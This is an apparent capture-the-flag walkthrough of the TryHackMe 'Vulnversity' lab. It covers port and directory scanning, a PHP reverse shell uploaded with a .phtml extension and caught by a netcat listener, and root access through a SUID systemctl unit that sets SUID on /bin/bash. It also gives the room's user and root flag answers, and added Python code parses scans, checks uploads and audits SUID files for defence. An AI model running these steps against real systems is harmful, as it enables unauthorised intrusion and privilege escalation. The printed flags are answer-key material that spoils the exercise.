Room Link : https://tryhackme.com/r/room/vulnversity
STEP1
nmap -p- -sSV 10.10.142.86 -Pn -T4 -A
FINDING
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn?
445/tcp open microsoft-ds?
3128/tcp open squid-http?
3333/tcp open dec-notes?
Scan the box; how many ports are open?
6
What version of the squid proxy is running on the machine?
3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
400
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
What is the flag for enabling verbose mode using Nmap?
-v
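To answer the questions above from a scan programmatically (count open ports, pull the version string, spot services nmap could not fingerprint), here is an added Python parser for the `PORT STATE SERVICE VERSION` table that `nmap -sV` prints. It is not part of the room or of this write-up; the sample text it parses is the table from STEP1, re-embedded here as a constant so it runs offline. The trailing `?` on a service name is nmap's own marker for a service it guessed from the port number without a matching probe response.

```python
import re

# Constructed sample: the nmap table from STEP1, embedded so the parser runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          vsftpd 3.0.3
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
3128/tcp open  squid-http?
3333/tcp open  dec-notes?
"""

# One table row: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_nmap_table(text):
    """Parse the PORT/STATE/SERVICE/VERSION table into a list of dicts."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header line, blank lines, NSE script output
        service = m.group("service")
        rows.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            "service": service.rstrip("?"),
            # nmap appends '?' when it guessed the service from the port alone.
            "uncertain": service.endswith("?"),
            "version": (m.group("version") or "").strip(),
        })
    return rows


def open_ports(rows):
    """Sorted list of ports whose state is 'open' (answers 'how many ports are open?')."""
    return sorted(r["port"] for r in rows if r["state"] == "open")


def unfingerprinted(rows):
    """Ports nmap could not confirm a service/version for: manual follow-up candidates."""
    return [r["port"] for r in rows if r["uncertain"] or not r["version"]]


def guess_os(rows):
    """Crude OS hint from distribution names embedded in version strings."""
    for r in rows:
        for name in ("Ubuntu", "Debian", "CentOS", "FreeBSD", "Windows"):
            if name in r["version"]:
                return name
    return None


if __name__ == "__main__":
    rows = parse_nmap_table(NMAP_OUTPUT)
    print("open ports:", open_ports(rows), "count:", len(open_ports(rows)))
    print("needs manual check:", unfingerprinted(rows))
    print("OS hint:", guess_os(rows))
```

The `unfingerprinted()` list is the useful part in practice: the squid version (3.5.12) is not in the table above because nmap only guessed `squid-http?`, so that answer has to come from the `-A` script output or from connecting to the port directly.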
-----------------------------------------------------------------------------------------------------
STEP2
gobuster dir -u http://10.10.142.86:3333/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
FINDING
/images (Status: 301) [Size: 320] [--> http://10.10.142.86:3333/images/]
/css (Status: 301) [Size: 317] [--> http://10.10.142.86:3333/css/]
/js (Status: 301) [Size: 316] [--> http://10.10.142.86:3333/js/]
/internal (Status: 301) [Size: 322] [--> http://10.10.142.86:3333/internal/]
What is the directory that has an upload form page?
/internal/
-----------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.142.86:3333/internal/
FINDING
==> DIRECTORY: http://10.10.142.86:3333/internal/uploads/
-----------------------------------------------------------------------------------------------------
STEP4
upload a PHP reverse shell (revershell.phtml) @ http://10.10.142.86:3333/internal/
try these extensions
.php
.php3
.php4
.php5
.phtml
see uploaded file @ http://10.10.142.86:3333/internal/uploads/
on new terminal nc -nvlp 1234
@ http://10.10.142.86:3333/internal/uploads/revershell.phtml
get reverse connection on the terminal
cd /home
cd bill
cat user.txt
FINDING
8bd7992fbe8a6ad22a63361004cfcedb
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
.php
What extension is allowed after running the above exercise?
.phtml
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb
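The upload form blocks `.php` but accepts `.phtml`, which the server still hands to the PHP interpreter. That is the classic blocklist failure: the check enumerates what to reject instead of what to accept. The added Python below (my example, not code from the room or the target application) puts the flawed check next to an allowlist version. `PHP_EXECUTABLE_EXTS` is an assumed handler list modelled on a typical Apache `FilesMatch` for PHP plus the extensions tried in this step; the exact set on a given server comes from its own config.

```python
import os

# Assumed: extensions a typical Apache+PHP setup hands to the interpreter. The write-up
# confirms .phtml executes on this box; the rest follow the extension list tried above.
PHP_EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}


# --- Vulnerable shape: reject one extension, accept everything else ---
BLOCKED = {".php"}


def blocklist_allows(filename):
    """Mirrors the behaviour the room shows: '.php' rejected, '.phtml' accepted."""
    _, ext = os.path.splitext(filename)
    return ext not in BLOCKED


def would_execute(filename):
    """Would a PHP handler run this name? Extension case is folded, the conservative assumption."""
    return os.path.splitext(filename)[1].lower() in PHP_EXECUTABLE_EXTS


# --- Hardened shape: allowlist of expected upload types plus name hygiene ---
ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}


def allowlist_allows(filename):
    """Accept only plain image names; reject path parts, empty stems and stacked extensions."""
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False  # directory traversal or degenerate name
    if "\x00" in base:
        return False  # a NUL would truncate the name in lower-level C code
    root, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED or not root:
        return False
    # 'shell.phtml.jpg': some handlers match an executable extension anywhere in the name.
    inner_exts = {"." + part.lower() for part in root.split(".")[1:]}
    if inner_exts & PHP_EXECUTABLE_EXTS:
        return False
    return True


def compare(filename):
    """Side-by-side verdict for one name: (blocklist accepts?, allowlist accepts?, PHP runs it?)."""
    return blocklist_allows(filename), allowlist_allows(filename), would_execute(filename)


if __name__ == "__main__":
    for name in ("shell.php", "shell.phtml", "photo.jpg", "shell.phtml.jpg", "../x.jpg"):
        print(f"{name:18} blocklist={compare(name)[0]!s:5} allowlist={compare(name)[1]!s:5} "
              f"executes={compare(name)[2]}")
```

The allowlist check is still only the first layer: on the server side the uploads directory should also be served without a PHP handler (or with script execution disabled), so that even a file that slips through the name check is returned as static content rather than run.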
-----------------------------------------------------------------------------------------------------
STEP5
python -c 'import pty; pty.spawn("/bin/bash")'
find / -type f -perm -4000 2>/dev/null
FINDING
/bin/systemctl
On the system, search for all SUID files. Which file stands out?
/bin/systemctl
-----------------------------------------------------------------------------------------------------
STEP6
now use --> https://gtfobins.github.io/gtfobins/systemctl/
on shell --> type below
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
bash -p
cd /root
ls
cat root.txt
FINDING
a58ff8579f0a9270368d33a9966c7fd5
What is the root flag value?
a58ff8579f0a9270368d33a9966c7fd5
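Steps 5 and 6 together show the defender's side of this box: a SUID bit on `/bin/systemctl` that a stock install does not have, and, after the GTFOBins technique runs, a second anomaly (`/bin/bash` with SUID set) plus a unit file under `/etc/systemd/system` that is a symlink into `/tmp`. The added Python below (my example, not from the room or from GTFOBins) audits both: it reproduces `find / -type f -perm -4000 2>/dev/null` and compares the result against a baseline, and it lists systemd unit symlinks that point into user-writable directories. `EXPECTED_SUID` is a constructed, partial baseline for illustration; a real one is generated from a known-good image of the same OS version.

```python
import os
import stat

# Constructed baseline: binaries that normally carry SUID on a stock Ubuntu 16.04 host.
# Illustrative and partial; generate the real list from a known-good image.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6", "/bin/fusermount",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
}

# Locations an unprivileged user can write to; a unit file living here is a red flag.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def scan_suid(root="/"):
    """Live equivalent of `find / -type f -perm -4000 2>/dev/null`: yield (path, mode)."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry, the 2>/dev/null of the original command
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode


def unexpected_suid(entries, baseline=EXPECTED_SUID):
    """SUID files that are not in the baseline, sorted. Takes scan_suid() output or test data."""
    return sorted(path for path, mode in entries
                  if mode & stat.S_ISUID and path not in baseline)


def scan_unit_links(unit_dir="/etc/systemd/system"):
    """Yield (unit_name, link_target) for every symlinked unit in unit_dir."""
    try:
        names = os.listdir(unit_dir)
    except OSError:
        return
    for name in names:
        full = os.path.join(unit_dir, name)
        if os.path.islink(full):
            yield name, os.readlink(full)


def suspicious_unit_links(links, writable=WRITABLE_PREFIXES):
    """Units whose file sits in a user-writable directory (what `systemctl link` on a
    /tmp file leaves behind) or that were linked from a relative path."""
    flagged = []
    for name, target in links:
        if not target.startswith("/") or target.startswith(writable):
            flagged.append((name, target))
    return sorted(flagged)


if __name__ == "__main__":
    for path in unexpected_suid(scan_suid()):
        print("unexpected SUID:", path)
    for name, target in suspicious_unit_links(scan_unit_links()):
        print("suspicious unit:", name, "->", target)
```

Run as root the script walks the whole filesystem; as an unprivileged user it silently skips what it cannot stat, exactly like the `find` one-liner. On this box the first loop would report `/bin/systemctl` before the privilege escalation and both `/bin/systemctl` and `/bin/bash` after it, and the second loop would show the `tmp.*.service` link created by `systemctl link`.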
-----------------------------------------------------------------------------------------------------